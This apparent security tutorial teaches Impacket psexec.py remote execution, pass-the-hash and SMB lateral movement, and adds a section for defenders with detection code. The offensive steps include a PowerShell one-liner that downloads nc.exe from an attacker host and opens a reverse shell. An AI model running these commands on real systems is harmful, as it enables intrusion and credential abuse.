
Introduction:
Impacket’s PsExec implementation (psexec.py) allows penetration testers to execute commands remotely over the SMB protocol, mimicking the legitimate Windows Sysinternals PsExec tool. By leveraging credentials or NTLM hashes, attackers can obtain interactive shells, upload payloads, and move laterally across a network, making it a core technique for internal post‑exploitation.
Learning Objectives:
- Execute remote commands and spawn interactive shells on Windows targets using psexec.py.
- Perform Pass‑the‑Hash (PtH) attacks to authenticate without knowing the plaintext password.
- Upload malicious payloads and move laterally across multiple hosts in a domain environment.
You Should Know:
1. Installing Impacket and Dependencies
Impacket is a Python library for network protocols; psexec.py is one of its many tools. Follow this step‑by‑step guide to set it up on a Linux attack machine (Kali or any Debian‑based distro).
Step‑by‑step installation:
- Update your package list: `sudo apt update`
- Install Python3 and pip if missing: `sudo apt install python3 python3-pip -y`
- Install Impacket directly from GitHub (latest version):
  `git clone https://github.com/SecureAuthCorp/impacket.git`
  `cd impacket`
  `sudo python3 setup.py install`
- Alternatively, install via pip: `sudo pip3 install impacket`
- Verify installation: `psexec.py -h` (should display the help menu)
Windows alternative: Impacket can be run from Windows using Python or WSL, but Linux is preferred for penetration testing.
2. Basic Remote Command Execution with psexec.py
psexec.py connects to the ADMIN$ share (C:\Windows) and uploads a service executable to run your commands. Use it when you have valid credentials (username/password) for a target.
Syntax: `psexec.py domain/username:password@target_ip command`
Step‑by‑step guide:
- Identify a reachable Windows target (e.g., 192.168.1.10) with SMB port 445 open.
- Run a single command remotely: `psexec.py administrator:<password>@192.168.1.10 "whoami"`
- Get an interactive shell (leave the command blank or use cmd.exe): `psexec.py administrator:<password>@192.168.1.10`
- Use the `-target-ip` flag if hostname resolution fails: `psexec.py admin:<password>@<hostname> -target-ip 192.168.1.10`
- For domain users: `psexec.py DOMAIN/user:<password>@192.168.1.10`
Expected output: The command output returns to your terminal, and an interactive shell shows the `C:\Windows\system32>` prompt.
3. Pass‑the‑Hash (PtH) with NTLM Hashes
When you have only the NTLM hash (extracted from LSASS, SAM, or NTDS.dit), psexec.py supports PtH without the plaintext password. This is a game‑changer for lateral movement.
Step‑by‑step guide:
- Obtain an NTLM hash (e.g., `aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0` for a blank password).
- Use the hash in place of the password with the `-hashes` flag (LM:NT format): `psexec.py <user>@192.168.1.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0`
- For a real hash (e.g., NTLM hash 570a9a65db17f4c6c1e3d53c26a3c9e8): `psexec.py DOMAIN/<user>@192.168.1.10 -hashes :570a9a65db17f4c6c1e3d53c26a3c9e8`
- Combine with `-no-pass` if you only have the hash.
- Verify access by running `whoami` inside the shell.
Troubleshooting: If the target has SMB signing enabled, PtH may fail. Check with `nmap --script smb-security-mode -p445 192.168.1.10`.
4. Uploading and Executing Payloads
Once you have a shell, you can upload custom tools (reverse shells, Mimikatz, etc.) and execute them. psexec.py itself does not have a built‑in upload command, but you can combine it with Impacket’s `smbclient.py` or use a simple PowerShell download cradle.
Step‑by‑step guide using smbclient.py:
- Open a separate terminal and connect to the target’s ADMIN$ share: `smbclient.py administrator:<password>@<target> -target-ip 192.168.1.10`
- Inside smbclient, upload a payload: `put /home/attacker/reverse_shell.exe rev.exe`
- From your psexec.py shell, execute the uploaded payload: `C:\Windows\system32> C:\rev.exe`
Alternative PowerShell method (no extra tools):
- In the psexec shell, run a one‑liner to download and execute: `powershell -c "Invoke-WebRequest -Uri http://attacker_ip/nc.exe -OutFile C:\nc.exe; C:\nc.exe attacker_ip 4444 -e cmd.exe"`
5. Lateral Movement Across the Network
After compromising one host, use psexec.py to pivot to other machines. This requires that the same credentials or hashes work on multiple hosts (common with local admin accounts or domain admins).
Step‑by‑step guide:
- On the first compromised host, run `net view` to discover other machines or query DNS for internal servers.
- Use psexec.py directly from your attack machine to the next target: `psexec.py DOMAIN/<user>@<next_target_ip> -hashes :570a9a65db17f4c6c1e3d53c26a3c9e8`
- For stealth, proxy your traffic through the compromised host using proxychains:
  - Configure `/etc/proxychains4.conf` with `socks5 127.0.0.1 1080`
  - On the compromised host, start a SOCKS tunnel via SSH or chisel.
  - Run psexec.py through proxychains: `proxychains psexec.py user@internal_target …`
- Automate lateral movement with a script that iterates over a list of IPs and tries the same hash.
Real‑world scenario: From a workstation, move to a file server, then to a domain controller – all with the same NTLM hash extracted from LSASS.
6. Detecting and Mitigating PsExec Attacks (For Defenders)
Understanding the attack allows blue teams to harden their environment. Here are key mitigations and detection methods.
Detection:
- Monitor Event ID 7045 (service installation) – psexec.py creates a temporary service (e.g., PSEXESVC).
- Look for Event ID 4624 (logon type 3 – network logon) followed by 4672 (special privileges assigned).
- Track network connections from unusual processes to port 445 (SMB) from non‑domain workstations.
- Use Sysmon event ID 1 (process creation) for `cmd.exe` or `powershell.exe` spawned by services.
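As an added example (not code from the original post), the following Python correlates the three event IDs listed above over a constructed line-delimited JSON export: a 7045 whose service name is PSEXESVC, or whose binary sits directly in the Windows directory (what an upload to ADMIN$ produces), is paired with a preceding type-3 logon and its 4672. The field names are an assumed simplified SIEM shape, not the raw Windows event schema, and the Windows-root path heuristic is this example's assumption.

```python
import json
import re
from datetime import datetime, timedelta

# Constructed sample export (one JSON record per line, assumed simplified SIEM field names).
SAMPLE_EVENTS = r"""
{"EventID": 4624, "TimeCreated": "2024-05-01T10:00:01", "LogonType": 3, "TargetUserName": "administrator", "IpAddress": "10.0.0.5", "TargetLogonId": "0x3e7a1"}
{"EventID": 4672, "TimeCreated": "2024-05-01T10:00:01", "SubjectUserName": "administrator", "SubjectLogonId": "0x3e7a1"}
{"EventID": 7045, "TimeCreated": "2024-05-01T10:00:03", "ServiceName": "kXtq", "ImagePath": "%SYSTEMROOT%\\hGbVwPzq.exe"}
{"EventID": 7045, "TimeCreated": "2024-05-01T11:30:00", "ServiceName": "Backup Agent", "ImagePath": "C:\\Program Files\\Vendor\\agent.exe"}
{"EventID": 4624, "TimeCreated": "2024-05-01T12:00:00", "LogonType": 2, "TargetUserName": "alice", "IpAddress": "127.0.0.1", "TargetLogonId": "0x5a"}
"""

# Heuristic (assumption): a service binary directly under the Windows directory is what an
# ADMIN$ (C:\Windows) upload produces; most legitimate services install deeper in the tree.
WINDOWS_ROOT_EXE = re.compile(r"^(?:%SYSTEMROOT%|C:\\WINDOWS)\\[^\\]+\.EXE$", re.IGNORECASE)


def parse_events(text):
    """Parse the line-delimited JSON export and attach a datetime to each record."""
    events = []
    for line in text.strip().splitlines():
        ev = json.loads(line)
        ev["_ts"] = datetime.fromisoformat(ev["TimeCreated"])
        events.append(ev)
    return events


def is_suspicious_service(ev):
    """Flag a 7045 that uses the Sysinternals service name or a Windows-root image path."""
    if ev.get("EventID") != 7045:
        return False
    if ev.get("ServiceName", "").upper() == "PSEXESVC":
        return True
    return bool(WINDOWS_ROOT_EXE.match(ev.get("ImagePath", "")))


def correlate(events, window=timedelta(seconds=60)):
    """Pair each suspicious install with a 4624 type-3 logon in the preceding window and its 4672."""
    alerts = []
    for svc in filter(is_suspicious_service, events):
        for logon in events:
            if logon["EventID"] != 4624 or logon.get("LogonType") != 3:
                continue
            if not (svc["_ts"] - window <= logon["_ts"] <= svc["_ts"]):
                continue
            privileged = any(e["EventID"] == 4672 and e.get("SubjectLogonId") == logon["TargetLogonId"]
                             for e in events)
            alerts.append({"service": svc["ServiceName"], "image": svc["ImagePath"],
                           "user": logon["TargetUserName"], "source_ip": logon["IpAddress"],
                           "admin_privileges": privileged})
    return alerts
```

On the sample data only the `kXtq` install is raised, attributed to `administrator` from 10.0.0.5 with admin privileges; the vendor service under Program Files and the local type-2 logon are ignored.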
Mitigation commands (Windows):
- Disable the ADMIN$ share if not needed (not recommended for production): `net share ADMIN$ /delete`
- Enforce SMB signing on all Windows machines: `Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "RequireSecuritySignature" -Value 1`
- Restrict local administrator privileges via LAPS (Local Administrator Password Solution).
- Enable Windows Defender Firewall to block inbound SMB from untrusted subnets.
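To audit which hosts still accept unsigned SMB after rolling out the signing mitigation, this added Python (not from the original post) parses the normal output of the nmap `smb-security-mode` script cited in section 3 and lists every host whose `message_signing` value is not `required`; the scan excerpt is constructed.

```python
import re

# Constructed nmap normal-output excerpt for two hosts (not a real scan).
SAMPLE_NMAP_OUTPUT = """
Nmap scan report for 192.168.1.10
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap scan report for 192.168.1.20
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|_  message_signing: required
"""

HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")
SIGNING_LINE = re.compile(r"^\|_?\s+message_signing:\s*(\S+)")


def parse_signing(text):
    """Map each scanned host to the first word of its message_signing value
    ('disabled', 'supported' or 'required'); hosts with no script output are omitted."""
    status, host = {}, None
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            host = m.group(1)
            continue
        m = SIGNING_LINE.match(line)
        if m and host:
            status[host] = m.group(1)
    return status


def hosts_needing_signing(text):
    """Hosts whose SMB server does not require signing, i.e. where the mitigation has not taken effect."""
    return sorted(h for h, s in parse_signing(text).items() if s != "required")
```

The script reports the target's server-side setting, so `required` on every host is the state to aim for; `supported` still lets a client negotiate an unsigned session.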
7. Advanced: Impacket PsExec with Proxychains for Pivoting
When you have limited direct access (e.g., only one edge host is reachable), use proxychains to route psexec traffic through a compromised pivot.
Step‑by‑step guide:
- Compromise a Linux pivot host (or Windows with SSH) inside the target network.
- On your attack machine, set up a dynamic SOCKS tunnel using SSH: `ssh -D 1080 user@pivot_host`
- Edit `/etc/proxychains4.conf` to ensure `socks5 127.0.0.1 1080` is uncommented and `proxy_dns` is enabled.
- Run psexec.py through proxychains: `proxychains psexec.py DOMAIN/<user>@<internal_target> -hashes :NTLMhash`
- The traffic will tunnel through the pivot, allowing you to reach internal hosts not directly accessible.
For Windows pivots: Use `chisel` to create a SOCKS proxy, then point proxychains to the chisel client’s port.
What Undercode Say:
- Key Takeaway 1: Impacket’s psexec.py is a Swiss Army knife for SMB‑based remote execution – combining it with Pass‑the‑Hash and lateral movement techniques gives red teams reliable post‑exploitation capabilities even without plaintext passwords.
- Key Takeaway 2: Defenders must prioritize SMB signing, privileged access management, and service installation monitoring; a single compromised local admin hash can lead to full domain takeover if lateral movement is unchecked.
Analysis: The beauty of psexec.py lies in its simplicity – one command transforms a hash into an interactive shell. However, its reliance on service creation (Event ID 7045) is a clear detection signature. Modern EDRs often flag this behavior, but many internal networks still lack proper SMB hardening. Attackers increasingly combine psexec.py with tools like `ntlmrelayx` or `secretsdump` to extend the attack chain. For blue teams, implementing LAPS and blocking NTLM authentication where possible drastically reduces the impact of PtH. As cloud and hybrid environments grow, SMB lateral movement remains a persistent threat – legacy protocols die hard.
Prediction:
As Microsoft pushes cloud‑native authentication (Azure AD, Windows Hello) and deprecates NTLM, traditional PtH attacks will lose effectiveness over the next 2–3 years. However, legacy on‑premise systems will persist in critical infrastructure, keeping Impacket PsExec relevant for red teams. Attackers will shift toward abusing SMB over QUIC (SMB over HTTP/3) or encrypted RPC channels, forcing tools like psexec.py to evolve. Simultaneously, defenders will adopt zero‑trust micro‑segmentation, making lateral movement via SMB far more challenging. The cat‑and‑mouse game will move from credential theft to misconfigured service accounts and token manipulation – but for now, psexec.py remains a pentester’s best friend.
Reported By: Shubham Sharmaa – Hackers Feeds